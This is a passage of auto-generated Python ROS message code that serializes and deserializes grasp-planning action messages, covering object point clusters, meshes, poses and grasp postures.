val1.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.value = str[start:end]
self.action_feedback.feedback.object.object.properties.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields = []
for i in range(0, length):
val1 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
_x = val1
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields.append(val1)
_x = self
start = end
end += 9
(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step,) = _get_struct_B2I().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_bigendian = bool(self.action_feedback.feedback.object.object.point_cluster.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.action_feedback.feedback.object.object.point_cluster.data = str[start:end]
start = end
end += 1
(self.action_feedback.feedback.object.object.point_cluster.is_dense,) = _get_struct_B().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_dense = bool(self.action_feedback.feedback.object.object.point_cluster.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitives = []
for i in range(0, length):
val1 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val1.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val1.dimensions = s.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitives.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v134 = val1.position
_x = _v134
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v135 = val1.orientation
_x = _v135
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.meshes = []
for i in range(0, length):
val1 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.triangles = []
for i in range(0, length):
val2 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val2.vertex_indices = _get_struct_3I().unpack(str[start:end])
val1.triangles.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.vertices = []
for i in range(0, length):
val2 = geometry_msgs.msg.Point()
_x = val2
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val1.vertices.append(val2)
self.action_feedback.feedback.object.object.meshes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v136 = val1.position
_x = _v136
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v137 = val1.orientation
_x = _v137
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses.append(val1)
start = end
end += 32
self.action_feedback.feedback.object.object.surface.coef = _get_struct_4d().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.grasps = []
for i in range(0, length):
val1 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.id = str[start:end]
_v138 = val1.pre_grasp_posture
_v139 = _v138.header
start = end
end += 4
(_v139.seq,) = _get_struct_I().unpack(str[start:end])
_v140 = _v139.stamp
_x = _v140
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v139.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v139.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v138.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v138.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v138.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = s.unpack(str[start:end])
_v141 = val3.time_from_start
_x = _v141
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v138.points.append(val3)
_v142 = val1.grasp_posture
_v143 = _v142.header
start = end
end += 4
(_v143.seq,) = _get_struct_I().unpack(str[start:end])
_v144 = _v143.stamp
_x = _v144
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v143.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v143.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v142.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v142.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v142.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = s.unpack(str[start:end])
_v145 = val3.time_from_start
_x = _v145
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v142.points.append(val3)
_v146 = val1.grasp_pose
_v147 = _v146.header
start = end
end += 4
(_v147.seq,) = _get_struct_I().unpack(str[start:end])
_v148 = _v147.stamp
_x = _v148
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v147.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v147.frame_id = str[start:end]
_v149 = _v146.pose
_v150 = _v149.position
_x = _v150
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v151 = _v149.orientation
_x = _v151
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val1.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v152 = val1.pre_grasp_approach
_v153 = _v152.direction
_v154 = _v153.header
start = end
end += 4
(_v154.seq,) = _get_struct_I().unpack(str[start:end])
_v155 = _v154.stamp
_x = _v155
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v154.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v154.frame_id = str[start:end]
_v156 = _v153.vector
_x = _v156
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v152
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v157 = val1.post_grasp_retreat
_v158 = _v157.direction
_v159 = _v158.header
start = end
end += 4
(_v159.seq,) = _get_struct_I().unpack(str[start:end])
_v160 = _v159.stamp
_x = _v160
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v159.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v159.frame_id = str[start:end]
_v161 = _v158.vector
_x = _v161
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v157
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v162 = val1.post_place_retreat
_v163 = _v162.direction
_v164 = _v163.header
start = end
end += 4
(_v164.seq,) = _get_struct_I().unpack(str[start:end])
_v165 = _v164.stamp
_x = _v165
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v164.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v164.frame_id = str[start:end]
_v166 = _v163.vector
_x = _v166
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v162
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val1.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8', 'rosmsg')
else:
val2 = str[start:end]
val1.allowed_touch_objects.append(val2)
self.action_feedback.feedback.object.grasps.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
_x = self.action_goal.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
_x = self.action_goal.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_B3I().pack(_x.action_goal.goal.plan_grasps, _x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
_x = self.action_result.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
_x = self.action_result.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_result.status.status
buff.write(_get_struct_B().pack(_x))
_x = self.action_result.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.action_result.result.objects)
buff.write(_struct_I.pack(length))
for val1 in self.action_result.result.objects:
_v167 = val1.object
_v168 = _v167.header
_x = _v168.seq
buff.write(_get_struct_I().pack(_x))
_v169 = _v168.stamp
_x = _v169
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v168.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v167.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v167.support_surface
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v167.properties)
buff.write(_struct_I.pack(length))
for val3 in _v167.properties:
_x = val3.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val3.value
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v170 = _v167.point_cluster
_v171 = _v170.header
_x = _v171.seq
buff.write(_get_struct_I().pack(_x))
_v172 = _v171.stamp
_x = _v172
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v171.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v170
buff.write(_get_struct_2I().pack(_x.height, _x.width))
length = len(_v170.fields)
buff.write(_struct_I.pack(length))
for val4 in _v170.fields:
_x = val4.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val4
buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = _v170
buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
_x = _v170.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v170.is_dense
buff.write(_get_struct_B().pack(_x))
length = len(_v167.primitives)
buff.write(_struct_I.pack(length))
for val3 in _v167.primitives:
_x = val3.type
buff.write(_get_struct_B().pack(_x))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.dimensions.tostring())
length = len(_v167.primitive_poses)
buff.write(_struct_I.pack(length))
for val3 in _v167.primitive_poses:
_v173 = val3.position
_x = _v173
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v174 = val3.orientation
_x = _v174
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
length = len(_v167.meshes)
buff.write(_struct_I.pack(length))
for val3 in _v167.meshes:
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
for val4 in val3.triangles:
buff.write(val4.vertex_indices.tostring())
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
length = len(_v167.mesh_poses)
buff.write(_struct_I.pack(length))
for val3 in _v167.mesh_poses:
_v175 = val3.position
_x = _v175
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v176 = val3.orientation
_x = _v176
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_v177 = _v167.surface
buff.write(_v177.coef.tostring())
length = len(val1.grasps)
buff.write(_struct_I.pack(length))
for val2 in val1.grasps:
_x = val2.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v178 = val2.pre_grasp_posture
_v179 = _v178.header
_x = _v179.seq
buff.write(_get_struct_I().pack(_x))
_v180 = _v179.stamp
_x = _v180
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v179.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v178.joint_names)
buff.write(_struct_I.pack(length))
for val4 in _v178.joint_names:
length = len(val4)
if python3 or type(val4) == unicode:
val4 = val4.encode('utf-8')
length = len(val4)
buff.write(struct.Struct('<I%ss'%length).pack(length, val4))
length = len(_v178.points)
buff.write(_struct_I.pack(length))
for val4 in _v178.points:
length = len(val4.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.positions.tostring())
length = len(val4.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.velocities.tostring())
length = len(val4.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.accelerations.tostring())
length = len(val4.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.effort.tostring())
_v181 = val4.time_from_start
_x = _v181
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v182 = val2.grasp_posture
_v183 = _v182.header
_x = _v183.seq
buff.write(_get_struct_I().pack(_x))
_v184 = _v183.stamp
_x = _v184
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v183.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(_v182.joint_names)
buff.write(_struct_I.pack(length))
for val4 in _v182.joint_names:
length = len(val4)
if python3 or type(val4) == unicode:
val4 = val4.encode('utf-8')
length = len(val4)
buff.write(struct.Struct('<I%ss'%length).pack(length, val4))
length = len(_v182.points)
buff.write(_struct_I.pack(length))
for val4 in _v182.points:
length = len(val4.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.positions.tostring())
length = len(val4.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.velocities.tostring())
length = len(val4.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.accelerations.tostring())
length = len(val4.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val4.effort.tostring())
_v185 = val4.time_from_start
_x = _v185
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
_v186 = val2.grasp_pose
_v187 = _v186.header
_x = _v187.seq
buff.write(_get_struct_I().pack(_x))
_v188 = _v187.stamp
_x = _v188
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v187.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v189 = _v186.pose
_v190 = _v189.position
_x = _v190
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v191 = _v189.orientation
_x = _v191
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_x = val2.grasp_quality
buff.write(_get_struct_d().pack(_x))
_v192 = val2.pre_grasp_approach
_v193 = _v192.direction
_v194 = _v193.header
_x = _v194.seq
buff.write(_get_struct_I().pack(_x))
_v195 = _v194.stamp
_x = _v195
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v194.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v196 = _v193.vector
_x = _v196
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v192
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v197 = val2.post_grasp_retreat
_v198 = _v197.direction
_v199 = _v198.header
_x = _v199.seq
buff.write(_get_struct_I().pack(_x))
_v200 = _v199.stamp
_x = _v200
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v199.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v201 = _v198.vector
_x = _v201
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v197
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_v202 = val2.post_place_retreat
_v203 = _v202.direction
_v204 = _v203.header
_x = _v204.seq
buff.write(_get_struct_I().pack(_x))
_v205 = _v204.stamp
_x = _v205
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v204.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v206 = _v203.vector
_x = _v206
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_x = _v202
buff.write(_get_struct_2f().pack(_x.desired_distance, _x.min_distance))
_x = val2.max_contact_force
buff.write(_get_struct_f().pack(_x))
length = len(val2.allowed_touch_objects)
buff.write(_struct_I.pack(length))
for val3 in val2.allowed_touch_objects:
length = len(val3)
if python3 or type(val3) == unicode:
val3 = val3.encode('utf-8')
length = len(val3)
buff.write(struct.Struct('<I%ss'%length).pack(length, val3))
length = len(self.action_result.result.support_surfaces)
buff.write(_struct_I.pack(length))
for val1 in self.action_result.result.support_surfaces:
_v207 = val1.header
_x = _v207.seq
buff.write(_get_struct_I().pack(_x))
_v208 = _v207.stamp
_x = _v208
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v207.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1.support_surface
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(val1.properties)
buff.write(_struct_I.pack(length))
for val2 in val1.properties:
_x = val2.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val2.value
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_v209 = val1.point_cluster
_v210 = _v209.header
_x = _v210.seq
buff.write(_get_struct_I().pack(_x))
_v211 = _v210.stamp
_x = _v211
buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))
_x = _v210.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v209
buff.write(_get_struct_2I().pack(_x.height, _x.width))
length = len(_v209.fields)
buff.write(_struct_I.pack(length))
for val3 in _v209.fields:
_x = val3.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val3
buff.write(_get_struct_IBI().pack(_x.offset, _x.datatype, _x.count))
_x = _v209
buff.write(_get_struct_B2I().pack(_x.is_bigendian, _x.point_step, _x.row_step))
_x = _v209.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))
else:
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = _v209.is_dense
buff.write(_get_struct_B().pack(_x))
length = len(val1.primitives)
buff.write(_struct_I.pack(length))
for val2 in val1.primitives:
_x = val2.type
buff.write(_get_struct_B().pack(_x))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val2.dimensions.tostring())
length = len(val1.primitive_poses)
buff.write(_struct_I.pack(length))
for val2 in val1.primitive_poses:
_v212 = val2.position
_x = _v212
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v213 = val2.orientation
_x = _v213
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.meshes)
buff.write(_struct_I.pack(length))
for val2 in val1.meshes:
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
for val3 in val2.triangles:
buff.write(val3.vertex_indices.tostring())
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
length = len(val1.mesh_poses)
buff.write(_struct_I.pack(length))
for val2 in val1.mesh_poses:
_v214 = val2.position
_x = _v214
buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))
_v215 = val2.orientation
_x = _v215
buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))
_v216 = val1.surface
buff.write(_v216.coef.tostring())
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
_x = self.action_feedback.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
_x = self.action_feedback.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.status.status
buff.write(_get_struct_B().pack(_x))
_x = self.action_feedback.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs))
_x = self.action_feedback.feedback.object.object.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.feedback.object.object.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self.action_feedback.feedback.object.object.support_surface
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
length = len(self.action_feedback.feedback.object.object.properties)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.properties:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1.value
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs))
_x = self.action_feedback.feedback.object.object.point_cluster.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width))
length = len(self.action_feedback.feedback.object.object.point_cluster.fields)
buff.write(_struct_I.pack(length))
for val1 in self.action_feedback.feedback.object.object.point_cluster.fields:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.Struct('<I%ss'%length).pack(length, _x))
_x = val1
